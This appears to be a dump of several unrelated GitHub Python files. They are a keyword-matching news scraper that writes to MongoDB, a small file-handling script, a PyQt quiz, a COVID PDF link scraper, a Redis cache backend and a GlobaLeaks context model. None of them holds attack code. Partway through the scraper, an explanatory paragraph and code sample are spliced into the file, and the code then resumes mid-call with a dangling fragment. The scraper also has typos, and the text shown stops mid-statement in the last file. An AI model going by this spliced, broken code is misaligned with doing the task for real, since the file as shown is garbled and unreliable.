keywords):\r\n\treturn searchPage(soup , keywords , None , {\"class\": 'article-content'})\r\n\t\r\ndef searchSundayGuardin(soup , keywords):\r\n\treturn searchPage(soup , keywords , None , \"div.field-content.field-name-body-article\")\r\n\r\ndef searchHindustanTimes(soup , 
keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"class\": 'story-details' , \"itemprop\":\"articlebody\" })\r\n\r\ndef searchTheGuardian(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"itemprop\":\"articleBody\" })\r\n\t\r\ndef searchNDTV(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"itemprop\":\"articleBody\" })\r\n\r\ndef searchMidDay(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"span\" , {\"itemprop\":\"articleBody\" })\r\n\t\r\ndef searchNews18(soup , keywords):\r\n\treturn searchPage1(soup , keywords , \"div\" , {\"id\":\"article_body\" })\r\n\t\r\ndef searchOpIndia(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"id\":\"content-main\" })\r\n\r\ndef searchLiveMint(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"class\":\"content-box\" })\r\n\r\ndef searchSirfNews(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"class\":\"td-post-content\" })\r\n\r\ndef searchReuters(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"class\":re.compile(\"PrimaryAsset_container\") })\r\n\r\ndef searchSwarajya(soup , keywords):\r\n\treturn searchPage(soup , keywords , None , \"div.story-element.story-element-text\")\r\n\r\ndef searchCurrentRiggers(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"class\":\"entry-content\" })\r\n\r\ndef searchSatyaVijayi(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"class\":\"td-post-content\" })\r\n\r\ndef searchHinduPost(soup , keywords):\r\n\treturn searchPage2(soup , keywords , \"div\" , {\"id\":\"main-content\" , \"class\":\"mh-content\"} , \"and help pay for our journalism\")\r\n\r\ndef searchSimpleCapacity(soup , keywords):\t\r\n\treturn searchPage2(soup , keywords , \"div\" , {\"id\":\"content-main\" } , \"Your email address will not be published\")\r\n\r\ndef searchWorldReligionNews(soup , keywords):\r\n\treturn searchPage2(soup , keywords , \"div\" , {\"itemprop\":\"articleBody\" , \"class\":\"articlebody\" } , \"Your email address will not be published\")\r\n\r\ndef searchWorldHinduNews(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"class\":\"entry-content\" })\r\n\r\ndef searchDailyo(soup , keywords):\r\n\treturn searchPage2(soup , keywords , \"div\" , {\"class\":\"mediumcontent\" } , 'title=\"Also read:')\r\n\r\ndef\tsearchAvenuemaol(soup , keywords):\r\n\treturn searchPage(soup , keywords , None , \"div.elements-box.mt-20\")\r\n\r\ndef searchHinduExistence(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"id\":\"single\" })\r\n\r\ndef searchHinduHumanRights(soup , keywords):\r\n\treturn searchPage2(soup , keywords , \"div\" , {\"class\":\"single-content\" } , '

    ')\r\n\r\ndef searchHinduJagruti(soup , keywords):\r\n\tif len(soup.select(\"body.news-template-default.single.single-news\" )) == 1:\r\n\t\treturn searchPage(soup , keywords , \"div\" , {\"id\":\"content\" , \"role\":\"main\" , \"class\":\"site-content\" })\r\n\telse:\r\n\t\treturn init_result()\r\n\r\ndef searchMediaCrooks(soup , keywords):\r\n\treturn searchPage(soup , keywords , None , \"div.post-body.entry-content\" , 1)\r\n\t\r\ndef searchDeccanHerald(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"class\":\"newsText\" },1)\r\n\r\ndef searchDeccanChronicle(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"id\":\"storyBody\" })\r\n\t\r\ndef searchBusinessStandard(soup , keywords):\r\n\tresult = init_result()\r\n\ttry:\r\n\t\tcontent = soup.find_all(\"div\" , class_=\"story-content\")\r\n\t\tif content is None:\r\n\t\t\treturn result\r\n\t\tif len(content) != 1:\r\n\t\t\treturn result\r\n\t\tresult[\"tag_match\"] = True\r\n\t\ttextContent = content[0].find(\"span\" , class_ = \"p-content\")\r\n\t\tif genSearchParagraph([textContent] , keywords) is not None:\r\n\t\t\tresult[\"keyword_match\"] = True\r\n\texcept:\r\n\t\tpass\r\n\treturn result\r\n\r\ndef searchHinduBusinessLine(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"class\":\"article-text\" },1)\r\n\r\ndef searchTelegraph(soup , keywords):\r\n\tresult = init_result()\r\n\ttry:\r\n\t\tp = soup.find(\"td\" , class_=\"articleheader\")\r\n\t\tif p is not None:\r\n\t\t\tresult[\"tag_match\"] = True\r\n\t\t\ttable = p.parent.parent\r\n\t\t\tif genSearchParagraph([table] , keywords) is not None:\r\n\t\t\t\tresult[\"keyword_match\"] = True\r\n\texcept:\r\n\t\tpass\r\n\treturn result\t\t\r\n\r\ndef searchEconomicTimes(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"class\":\"section1\" })\r\n\r\ndef searchFirstPost(soup , keywords):\t\r\n\treturn searchPage(soup , keywords , \"div\" , {\"class\":\"article-full-content\" , \"itemprop\":\"articleBody\" })\r\n\r\ndef searchDailyPost(soup , keywords):\r\n\treturn searchPage2(soup , keywords , \"div\" , {\"class\":\"post_content\" } , 'For more news updates Follow and Like us on')\r\n\t\r\ndef searchBangaloreMirror(soup , keywords):\r\n\treturn searchPage(soup , keywords , None , {\"id\":\"storydiv\" })\r\n\t\r\ndef searchTribuneIndia(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"span\" , {\"class\":\"storyText\" })\r\n\t\r\ndef searchAsianAge(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"id\":\"storyBody\" })\r\n\r\ndef searchScroll(soup , keywords):\r\n\treturn searchPage(soup , keywords , None , \"section.article-content.scroll-article-content.latest-article-content\")\r\n\r\ndef searchTelanganaToday(soup , keywords):\r\n\treturn searchPage(soup , keywords , None , \"div.entry-content\")\r\n\r\ndef searchBetterIndia(soup , keywords):\r\n\treturn searchPage(soup , keywords , None , {\"itemprop\":\"articleBody\" } , 1)\r\n\r\ndef searchFinancialExpress(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"itemprop\":\"articleBody\" , \"class\":\"main-story-content\" } , 1)\r\n\r\ndef searchFreePressJournal(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"itemprop\":\"articleBody\" })\r\n\r\ndef searchGreaterKashmirJournal(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"span\" , {\"class\":\"storyText\" })\r\n\r\n
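The thin wrappers above pass searchPage either an attribute dict (routed to find_all) or a CSS selector string (routed to select). Both lookups in this small self-contained sketch locate the same container; the HTML snippet is illustrative:

```python
from bs4 import BeautifulSoup

sample = '<div class="entry-content"><p>story body</p></div>'
soup = BeautifulSoup(sample, "html.parser")

by_attrs = soup.find_all("div", {"class": "entry-content"})  # attribute-dict filter
by_css = soup.select("div.entry-content")                    # CSS selector string
print(by_attrs[0].get_text() == by_css[0].get_text())        # True
```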
\"div\" , {\"id\":\"storydiv\" } , 1)\r\n\r\ndef searchNagalandPost(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"class\":\"NewsDetail\" } )\r\n\r\ndef searchDailyPioneer(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"span\" , {\"itemprop\":\"articleBody\" } )\r\n\t\r\ndef searchStateTimes(soup , keywords):\r\n\tif len(soup.select(\"div.mom-post-meta.single-post-meta\")) == 1:\r\n\t\treturn searchPage(soup , keywords , \"div\" , {\"class\":\"pf-content\" } )\r\n\telse:\r\n\t\treturn init_result()\r\n\r\ndef searchStarOfMysore(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"class\":\"entry-content\" } , 1 )\r\n\r\ndef searchNacHindTimes(soup , keywords):\r\n\tresult = init_result()\r\n\ttry:\r\n\t\tp = soup.find(\"article\" )\r\n\t\tif p is not None:\r\n\t\t\tresult[\"tag_match\"] = True\r\n\t\t\tcontent = p.find(\"div\" , class_=\"post-inner\")\r\n\t\t\tif genSearchParagraph(content.find_all(\"p\") , keywords) is not None:\r\n\t\t\t\tresult[\"keyword_match\"] = True\r\n\texcept:\r\n\t\tpass\r\n\treturn result\t\t\r\n\r\ndef searchMorungExpress(soup , keywords):\r\n\treturn searchPage2(soup , keywords , None , {\"id\":\"main2\" } , 'class=\"meta_permalink\">')\r\n\t\r\ndef searchNewsTodayNet(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"itemprop\":\"articleBody\" } )\r\n\r\ndef searchTheShillongTimes(soup , keywords)\t:\r\n\treturn searchPage4(soup , keywords , None , \"div.single-post-content.entry-content\" )\r\n\r\ndef searchNewsGram(soup , keywords):\r\n\treturn searchPage(soup , keywords , None , \"div.td-post-content\" )\r\n\r\ndef searchPacificMedia(soup , keywords):\r\n\treturn searchPage(soup , keywords , None , {\"class\":\"entry-content\"} )\r\n\t\r\ndef searchHaindavakeralam(soup , keywords):\r\n\treturn searchPage(soup , keywords , None , {\"id\":\"news-item\"} )\r\n\t\r\ndef searchSays(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"class\":\"story-middle\"} )\r\n\t\r\ndef searchChakraNews(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"article\" , {\"itemtype\":\"http://schema.org/CreativeWork\"} )\r\n\r\ndef searchMysteryOfIndia(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"class\":\"td-post-content\"} )\r\n\r\ndef\tsearchDharmaToday(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"div\" , {\"id\":\"blog-post-body-content\"} )\r\n\r\ndef searchPostcardNews(soup , keywords):\r\n\treturn searchPage(soup , keywords , \"article\" , {} )\r\n\r\ndef searchHansIndia(soup , keywords):\r\n\treturn searchPage(soup , keywords , None , \"div.fullwidth.pull-left.artical-panel\" )\r\n\t\r\ndef genSearchParagraph(elements , keywords):\r\n\tfor p in elements:\r\n\t\tfor searchText in keywords:\r\n\t\t\tif(p.get_text().find(searchText)) > -1 :\r\n\t\t\t\treturn searchText\r\n\treturn None\r\n\r\ndef filterParagraphs(paragraphs , searchText):\r\n\tidx = 0\r\n\tfor i in paragraphs:\r\n\t\tif(str(i).find(searchText)) > -1:\r\n\t\t\tbreak\r\n\t\tidx+=1\r\n\tnewp = paragraphs[:idx]\r\n\treturn newp\r\n\r\ndef log_error(error_str):\r\n\terr_log_f = open(config.error_file , \"a+\")\r\n\terr_log_f.write(error_str)\r\n\terr_log_f.write(\"\\n\")\r\n\terr_log_f.close()\t\r\n\t\r\n#done to truncate the result file before the run.\r\ndef log_result(result_str):\r\n\tf = open(config.result_file , \"a+\")\r\n\tf.write(result_str)\r\n\tf.write(\"\\n\")\r\n\tf.close()\r\n\t\r\ndef init_result():\r\n\tresult = {\"keyword_match\":False , 
\"tag_match\":False , \"headline\" : \"\" , \"author\" : \"\"}\r\n\treturn result\r\n\r\ndef get_keywords():\r\n\tk = open(config.keywords , \"r\")\r\n\tkeywords = []\r\n\tfor line in k:\r\n\t\tt = line.strip()\r\n\t\tif len(t) > 0:\r\n\t\t\tkeywords.append(\" \"+ t +\" \")\r\n\tk.close()\r\n\treturn keywords\r\n\r\ndef init_document():\r\n\tpattern = \"%B-%d-%Y\"\r\n\tdocument = {}\r\n\tdate_as_string = datetime.datetime.now().strftime(pattern)\r\n\tdate_as_epoch = int(time.time())\r\n\tdocument[\"_id\"] = date_as_epoch\r\n\tdocument[\"date_as_string\"] = date_as_string\r\n\treturn document\r\n\t\r\ndef init_logging():\r\n\tlogging.basicConfig(level=logging.DEBUG,\r\n filename=config.error_file,\r\n filemode='w')\r\n\tlogging.getLogger().setLevel(logging.ERROR)\r\n# main\r\ndef main():\r\n\tkeywords = get_keywords()\r\n\tdocument = init_document()\r\n\tinit_logging()\r\n\t#initialize database\r\n\ttry:\r\n\t\tclient = MongoClient()\r\n\t\tdb = client[\"news_scraper\"]\r\n\texcept:\r\n\t\tlogging.getLogger().exception(\"Mongd exception\")\t\r\n\tif len(sys.argv) > 1 :\r\n\t\tmode = sys.argv[1].strip()\r\n\t\tif mode == \"test\":\r\n\t\t\tlogging.getLogger().setLevel(logging.INFO)\r\n\t\t\tconfig.mode = \"test\"\r\n\t\t\tif sys.argv[2] == \"skip\":\r\n\t\t\t\tconfig.url_visited_check = False\r\n\t\t\tif len(sys.argv) > 3 and sys.argv[3] is not None and sys.argv[3] == \"-f\":\r\n\t\t\t\trUrl = sys.argv[4].strip()\r\n\t\t\t\to = urlparse(rUrl)\r\n\t\t\t\tlist = []\r\n\t\t\t\tsearchUrl(rUrl, 3, keywords, o.netloc , list , document , db)\r\n\t\t\t\tprint(document)\r\n\t\t\t\treturn\r\n\r\n\tcurtime = datetime.datetime.now().strftime(\"%I:%M%p on %B %d, %Y\")\r\n\r\n\topen(config.result_file , \"w\").close()\r\n\tlog_result(curtime)\r\n\t# initialize the document that needs to be written to the database\r\n\tdocument = init_document()\r\n\tf = open(config.websites , \"r\")\r\n\tfor line in f:\r\n\t\tprint(\"Processing \" + line + \"\\n\")\r\n\t\trUrl = line.strip()\r\n\t\to = urlparse(rUrl)\r\n\t\tlist = []\r\n\t\tsearchUrl(rUrl, 2, keywords, o.netloc , list , document , db)\r\n\tf.close()\r\n\tcurtime = datetime.datetime.now().strftime(\"%I:%M%p on %B %d, %Y\")\r\n\tlog_result(curtime)\r\n\tprint(document)\r\n\tsave_result(document , db)\r\n\t#client.close()\r\n\r\ndef save_result(document , db):\r\n\t#Write the document to mongo db.\r\n\ttry:\r\n\t\tcollection = db[\"scraping_result\"]\r\n\t\tcollection.replace_one({\"_id\":document[\"_id\"]} , document, upsert=True)\r\n\texcept:\r\n\t\tlogging.getLogger().exception(\"\")\r\n\r\ndef is_url_visited(url , db):\r\n\tres = False\r\n\tif config.url_visited_check == False:\r\n\t\treturn False\r\n\ttry:\r\n\t\tcollection = db[\"visited_url\"]\r\n\t\tif collection.find_one({\"_id\":url}) is not None:\r\n\t\t\tres = True\r\n\texcept:\r\n\t\tlogging.getLogger().exception(\"\")\t\r\n\treturn res\r\n\r\ndef mark_url_visited(url , db):\r\n\tif config.url_visited_check == False:\r\n\t\trerurn\r\n\ttry:\r\n\t\tcollection = db[\"visited_url\"]\r\n\t\tcollection.insert_one({\"_id\":url} , {\"visited\":\"True\"})\r\n\texcept:\r\n\t\tlogging.getLogger().exception(\"\")\r\n\r\nmain()\r\n","repo_name":"dashsant/scrapper","sub_path":"app/python/web_search3.py","file_name":"web_search3.py","file_ext":"py","file_size_in_byte":25568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44158266598","text":"def main():\n op = 1\n while (op != 4):\n print(\"File Handling\\n\")\n op = int(input(\"Select an 
option:\\n1)Create file\\n2)Read file\\n3)Append to file\\n4)Exit\\n\"))\n if (op == 1):\n name = input(\"Enter the name of the file: \")\n name += \".txt\"\n msg = input(\"Enter the message: \")\n createFile(name, msg)\n elif (op == 2):\n name = input(\"Enter the name of the file: \")\n name += \".txt\"\n readFile(name)\n elif (op == 3):\n name = input(\"Enter the name of the file: \")\n name += \".txt\"\n msg = input(\"Message to append to file: \")\n appendFile(name, msg)\n exit()\n\n\ndef createFile(name, msg):\n f = open(name, \"w\")\n if f.write(msg + \"\\n\"):\n print(\"File written successfully!\")\n closeFile(f)\n #We can do the same like this:\n \"\"\"\n with open(name, \"w\") as file:\n file.write(\"Something\")\n \n !!Without calling close()\n \"\"\"\n\n\ndef readFile(name):\n f = open(name) # 'r' is the default processing mode\n for line in f.readlines():\n print(line, end='')\n print()\n # print(f.read())\n closeFile(f)\n\n\ndef appendFile(name, msg):\n f = open(name, \"a\")\n f.write(msg)\n closeFile(f)\n\n\ndef closeFile(f):\n f.close()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"JorgeCastillo97/Python","sub_path":"file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"962744312","text":"#dksgfsjfgksf\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QApplication, QWidget,QPushButton, QLabel, QVBoxLayout, QHBoxLayout, QRadioButton, QMessageBox\nfrom random import randint\n \ndef show_win():\n victory_win = QMessageBox()\n victory_win.setWindowTitle('Викторина')\n victory_win.setText('Верно!')\n victory_win.exec_()\n \n \ndef show_lose():\n lose_win = QMessageBox()\n lose_win.setWindowTitle('Викторина')\n lose_win.setText('Попробуйте еще раз!')\n lose_win.exec_()\n \n \n \napp = QApplication([])\nmain_win = QWidget()\nmain_win.setWindowTitle('Викторина')\nmain_win.resize(500, 200)\nquestion = QLabel('В каком году была основана алгоритмика?')\nbtn_ans1 = QRadioButton('2010')\nbtn_ans2 = QRadioButton('2013')\nbtn_ans3 = QRadioButton('2016')\nbtn_ans4 = QRadioButton('2019')\n \n \nlayoutH1 = QHBoxLayout()\nlayoutH2 = QHBoxLayout()\nlayoutH3 = QHBoxLayout()\nlayout_main = QVBoxLayout()\n \nlayoutH1.addWidget(question, alignment=Qt.AlignCenter)\nlayoutH2.addWidget(btn_ans1, alignment=Qt.AlignCenter)\nlayoutH2.addWidget(btn_ans2, alignment=Qt.AlignCenter)\nlayoutH3.addWidget(btn_ans3, alignment=Qt.AlignCenter)\nlayoutH3.addWidget(btn_ans4, alignment=Qt.AlignCenter)\n \nlayout_main.addLayout(layoutH1)\nlayout_main.addLayout(layoutH2)\nlayout_main.addLayout(layoutH3)\n \nmain_win.setLayout(layout_main)\n \n \nbtn_ans3.clicked.connect(show_win)\nbtn_ans1.clicked.connect(show_lose)\nbtn_ans2.clicked.connect(show_lose)\nbtn_ans4.clicked.connect(show_lose)\nmain_win.show()\napp.exec_()\n","repo_name":"CEPblU1080/heartcheck1","sub_path":"victpy.py","file_name":"victpy.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73909471848","text":"#!venv/bin python3\n# -*- coding: utf-8 -*-\n\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport csv\n\nbaseUrl = 'https://www.pio.gov.cy/coronavirus/categories/press'\nhtml = urlopen(baseUrl).read()\nhtml = html.decode('utf-8')\n\nsoup = BeautifulSoup(html, features='html.parser')\npdfs = soup.find_all(\"a\", {\"class\": \"flag pdf\"})\n\nwith open('data.csv', 'w', newline='') as 
csvfile:\n\tcsvwriter = csv.writer(csvfile, quoting=csv.QUOTE_MINIMAL)\n\tfor pdf in pdfs[:10]:\n\t\thref = pdf[\"href\"]\n\t\tif \"stay\" in href or \"rapid\" in href:\n\t\t\tcsvwriter.writerow([href, pdf.text])\n\nwith open('latest.html', 'w') as f:\n\tfor pdf in pdfs[:10]:\n\t\thref = pdf[\"href\"]\n\t\tif \"stay\" in href or \"rapid\" in href:\n\t\t\tf.writelines(str(pdf))\n\t\t\tf.writelines(\"


    \")\n\n","repo_name":"kapiosk/CovidPIO","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28353257746","text":"import time\nimport json\n\nfrom redis import Redis\nfrom redis.exceptions import ConnectionError\n\nfrom .cache_dao import CacheDAO\n\n\nclass RedisBackend(CacheDAO):\n\n def __init__(self, redis1: Redis, redis2: Redis):\n self.redis1 = redis1\n self.redis2 = redis2\n\n @staticmethod\n def __test_dabase(redis: Redis):\n \"\"\"Test database\"\"\"\n if redis is None:\n return False\n try:\n redis.get(\"last_updated\")\n return True\n except ConnectionError:\n return False\n\n @staticmethod\n def __get_last_updated(redis: Redis):\n \"\"\"Get the last time the redis was updated\"\"\"\n temp = redis.get(\"last_updated\")\n return float(temp.decode()) if temp else 0\n\n def active_database(self):\n \"\"\"Get the active database\"\"\"\n redis_test_1 = self.__test_dabase(self.redis1)\n redis_test_2 = self.__test_dabase(self.redis2)\n if redis_test_1 and redis_test_2:\n temp1 = self.__get_last_updated(self.redis1)\n temp2 = self.__get_last_updated(self.redis2)\n\n if temp1 >= temp2:\n return self.redis1\n else:\n return self.redis2\n elif redis_test_1:\n return self.redis1\n elif redis_test_2:\n return self.redis2\n\n def inactive_database(self):\n \"\"\"Get the inactive database\"\"\"\n active_database = self.active_database()\n\n if active_database == self.redis2 and self.__test_dabase(self.redis1):\n return self.redis1\n elif active_database == self.redis1 and self.__test_dabase(self.redis2):\n return self.redis2\n else:\n return active_database\n\n def save(self, perms: dict):\n \"\"\"Save perms on cache\"\"\"\n\n redis = self.inactive_database()\n\n # Clean database\n redis.flushdb()\n\n redis.hmset(\"perms\", {\n hostname: json.dumps(keys)\n for hostname, keys in perms.items()\n })\n\n # Changement de redis\n redis.set(\"last_updated\", time.time())\n\n def get_perms(self, hostname: str=None):\n if hostname is None:\n return self.active_database().hgetall(\"perms\")\n else:\n return self.active_database().hget(\"perms\", hostname)","repo_name":"Valdimus/aSSHes","sub_path":"ssh/core/cache_daos/redis_dao.py","file_name":"redis_dao.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5455676355","text":"# -*- coding: UTF-8\n#\n# models/context\n# **************\n# \n# Implementation of the Storm DB side of context table and ORM\n\nfrom storm.exceptions import NotOneError\nfrom storm.twisted.transact import transact\n\nfrom storm.locals import Int, Pickle\nfrom storm.locals import Unicode, Bool, Date\nfrom storm.locals import Reference\n\nfrom globaleaks.utils import gltime, idops, log\nfrom globaleaks.models.base import TXModel\nfrom globaleaks.rest.errors import ContextGusNotFound, InvalidInputFormat\n\n__all__ = [ 'Context' ]\n\n\nclass Context(TXModel):\n from globaleaks.models.node import Node\n\n __storm_table__ = 'contexts'\n\n context_gus = Unicode(primary=True)\n\n node_id = Int()\n node = Reference(node_id, Node.id)\n\n name = Unicode()\n description = Unicode()\n fields = Pickle()\n\n languages_supported = Pickle()\n\n selectable_receiver = Bool()\n escalation_threshold = Int()\n\n creation_date = Date()\n update_date = Date()\n last_activity = Date()\n\n tip_max_access = Int()\n tip_timetolive = Int()\n file_max_download = 
Int()\n\n    # list of receiver_gus\n    receivers = Pickle()\n\n    # to be implemented in REST / dict\n    notification_profiles = Pickle()\n    delivery_profiles = Pickle()\n    inputfilter_chain = Pickle()\n    # to be implemented in REST / dict\n\n    # public stats reference\n    # private stats reference\n\n    @transact\n    def new(self, context_dict):\n        \"\"\"\n        @param context_dict: a dictionary containing the expected fields of a context,\n            defined as the contextDescriptionDict\n        @return: context_gus, the universally unique identifier of the context\n        \"\"\"\n        log.debug(\"[D] %s %s \" % (__file__, __name__), \"Context new\", context_dict)\n\n        store = self.getStore('context new')\n\n        cntx = Context()\n\n        cntx.context_gus = idops.random_context_gus()\n        cntx.node_id = 1\n\n        cntx.creation_date = gltime.utcDateNow()\n        cntx.update_date = gltime.utcDateNow()\n        cntx.last_activity = gltime.utcDateNow()\n        cntx.receivers = []\n\n        try:\n            cntx._import_dict(context_dict)\n        except KeyError:\n            store.rollback()\n            store.close()\n            raise InvalidInputFormat(\"Import failed near the Storm\")\n\n        store.add(cntx)\n        log.msg(\"Created context %s at the %s\" % (cntx.name, cntx.creation_date) )\n        store.commit()\n        store.close()\n\n        # return context_dict\n        return cntx.context_gus\n\n    @transact\n    def update(self, context_gus, context_dict):\n        \"\"\"\n        @param context_gus: the universal unique identifier\n        @param context_dict: the information fields that need to be updated; it is\n            assumed to be already validated, sanitized and logically verified\n            by the handlers\n        @return: None or Exception on error\n        \"\"\"\n        log.debug(\"[D] %s %s \" % (__file__, __name__), \"Context update of\", context_gus)\n        store = self.getStore('context update')\n\n        try:\n            requested_c = store.find(Context, Context.context_gus == unicode(context_gus)).one()\n        except NotOneError:\n            store.close()\n            raise ContextGusNotFound\n        if requested_c is None:\n            store.close()\n            raise ContextGusNotFound\n\n        try:\n            requested_c._import_dict(context_dict)\n        except KeyError:\n            store.rollback()\n            store.close()\n            raise InvalidInputFormat(\"Import failed near the Storm\")\n\n        requested_c.update_date = gltime.utcDateNow()\n\n        store.commit()\n        log.msg(\"Updated context %s in %s, created in %s\" %\n                (requested_c.name, requested_c.update_date, requested_c.creation_date) )\n\n        store.close()\n\n    @transact\n    def delete_context(self, context_gus):\n        \"\"\"\n        @param context_gus: the universal unique identifier of the context\n        @return: None if deleted correctly, or raises an exception if something is wrong.\n        \"\"\"\n        from globaleaks.models.receiver import Receiver\n        log.debug(\"[D] %s %s \" % (__file__, __name__), \"Context delete of\", context_gus)\n\n        # first, perform existence checks; this avoids continuous try/except here\n        if not self.exists(context_gus):\n            raise ContextGusNotFound\n\n        # delete all the references to the context in the receivers\n        receiver_iface = Receiver()\n\n        # this is not a yield because getStore is not yet called!\n        unlinked_receivers = receiver_iface.unlink_context(context_gus)\n\n        # TODO - delete all the tips associated with the context\n        # TODO - delete all the jobs associated with the context\n        # TODO - delete all the stats associated with the context\n        # TODO - align all the receivers present in self.receivers\n\n        store = self.getStore('context delete')\n\n        try:\n            requested_c = store.find(Context, Context.context_gus == unicode(context_gus)).one()\n        except NotOneError:\n            store.close()\n            raise ContextGusNotFound\n        if requested_c is None:\n            store.close()\n
            raise ContextGusNotFound\n\n        store.remove(requested_c)\n        store.commit()\n        store.close()\n\n        log.msg(\"Deleted context %s, created in %s used by %d receivers\" %\n                (requested_c.name, requested_c.creation_date, unlinked_receivers) )\n\n\n    @transact\n    def admin_get_single(self, context_gus):\n        \"\"\"\n        @param context_gus: UUID of the contexts\n        @return: the contextDescriptionDict requested, or an exception if it does not exist\n        \"\"\"\n        store = self.getStore('context admin_get_single')\n\n        try:\n            requested_c = store.find(Context, Context.context_gus == unicode(context_gus)).one()\n        except NotOneError:\n            store.close()\n            raise ContextGusNotFound\n        if requested_c is None:\n            store.close()\n            raise ContextGusNotFound\n\n        ret_context_dict = requested_c._description_dict()\n\n        store.close()\n        return ret_context_dict\n\n    @transact\n    def admin_get_all(self):\n        \"\"\"\n        @return: an array containing all contextDescriptionDict\n        \"\"\"\n        log.debug(\"[D] %s %s \" % (__file__, __name__), \"Context admin_get_all\")\n\n        store = self.getStore('context admin_get_all')\n\n        result = store.find(Context)\n\n        ret_contexts_dicts = []\n        for requested_c in result:\n            ret_contexts_dicts.append( requested_c._description_dict() )\n\n        store.close()\n        return ret_contexts_dicts\n\n    @transact\n    def public_get_single(self, context_gus):\n        \"\"\"\n        @param context_gus: requested context\n        @return: context dict, stripped of the 'reserved' info\n        \"\"\"\n        store = self.getStore('context public_get_single')\n\n        try:\n            requested_c = store.find(Context, Context.context_gus == unicode(context_gus)).one()\n        except NotOneError:\n            store.close()\n            raise ContextGusNotFound\n        if requested_c is None:\n            store.close()\n            raise ContextGusNotFound\n\n        ret_context_dict = requested_c._description_dict()\n        # remove the private keys from the public display of node information\n        ret_context_dict.pop('tip_max_access')\n        ret_context_dict.pop('tip_timetolive')\n        ret_context_dict.pop('file_max_download')\n        ret_context_dict.pop('escalation_threshold')\n\n        store.close()\n        return ret_context_dict\n\n    @transact\n    def public_get_all(self):\n        log.debug(\"[D] %s %s \" % (__file__, __name__), \"Context public_get_all\")\n\n        store = self.getStore('context public_get_all')\n\n        ret_contexts_dicts = []\n        result = store.find(Context)\n        # also \"None\" is fine: simply an empty array is returned\n\n        for requested_c in result:\n\n            description_dict = requested_c._description_dict()\n            # remove the private keys from the public display of node information\n            description_dict.pop('tip_max_access')\n            description_dict.pop('tip_timetolive')\n            description_dict.pop('file_max_download')\n            description_dict.pop('escalation_threshold')\n\n            ret_contexts_dicts.append(description_dict)\n\n        store.close()\n        return ret_contexts_dicts\n\n    @transact\n    def count(self):\n        \"\"\"\n        @return: the number of contexts. Not used at the moment\n        \"\"\"\n        store = self.getStore('context count')\n        contextnum = store.find(Context).count()\n        store.close()\n        return contextnum\n\n
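public_get_single and public_get_all above build the full description dict and then pop each private key; the inverse formulation, an explicit whitelist of public fields, cannot leak a newly added private field by omission. A minimal sketch with hypothetical data, not the project's code:

```python
PUBLIC_FIELDS = frozenset([
    "context_gus", "name", "description",
    "selectable_receiver", "languages", "fields", "receivers",
])

def public_view(description_dict):
    # Keep only whitelisted keys instead of popping the private ones.
    return {k: v for k, v in description_dict.items() if k in PUBLIC_FIELDS}

full = {"context_gus": "c1", "name": "ctx", "tip_max_access": 10,
        "escalation_threshold": 0}
print(public_view(full))  # {'context_gus': 'c1', 'name': 'ctx'}
```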
    # always called by a @transact method, from models\n    def exists(self, context_gus):\n        \"\"\"\n        @param context_gus: check if the requested context exists or not\n        @return: True if it exists, False if not; does not raise exceptions.\n        \"\"\"\n        log.debug(\"[D] %s %s \" % (__file__, __name__), \"Context exists ?\", context_gus)\n\n        store = self.getStore('context exist')\n\n        try:\n            requested_c = store.find(Context, Context.context_gus == unicode(context_gus)).one()\n\n            if requested_c is None:\n                retval = False\n            else:\n                retval = True\n\n        except NotOneError:\n            retval = False\n\n        store.close()\n        return retval\n\n    @transact\n    def update_languages(self, context_gus):\n\n        log.debug(\"[D] %s %s \" % (__file__, __name__), \"update_languages \", context_gus)\n\n        language_list = []\n\n        # for each receiver, check every supported language; if one is not\n        # present in the context's declared languages, append it\n        for rcvr in self.get_receivers('internal', context_gus):\n            for language in rcvr.get('know_languages'):\n                if not language in language_list:\n                    language_list.append(language)\n\n        store = self.getStore('context update_languages')\n        requested_c = store.find(Context, Context.context_gus == 